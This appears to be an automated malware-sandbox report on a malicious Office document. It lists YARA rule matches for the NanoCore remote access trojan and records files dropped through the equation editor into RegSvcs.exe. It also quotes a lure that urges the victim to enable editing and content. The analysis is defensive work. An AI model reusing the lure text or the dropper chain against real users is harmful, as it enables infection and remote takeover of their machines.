Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 21 22

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027626D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002683C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C0B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002630FC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280113
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F3CA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002733D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E510
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280548
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C55E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026F5C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027364E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00290654
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002766A2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00262692
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027589E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F8C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E973
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027397F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026BAD1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DADD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283CBA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027FCDE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00276CDB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00265D7E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00263EAD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283EE9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DF12
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB35F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2136
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA137
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD427D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFF3A6
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF655F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2508
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FBF730
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC3721
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC28F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCC8CE
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD088F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1903
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFEAD5
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102EA2B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD3BA1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD0DE0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1D98
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF2D2D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF4EB7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFCE8D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD1F2C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_009243A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092B310
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092DEB8
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00923788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BF28
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092C800
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00924458
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BFE6
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00933788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_009343A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00934458

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF6219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

Source: mmuiqlcvwo.pif.4.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\Public\vbc.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

Source: Joe Sandbox View

Dropped File: C:\Users\user\33920049\mmuiqlcvwo.pif C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
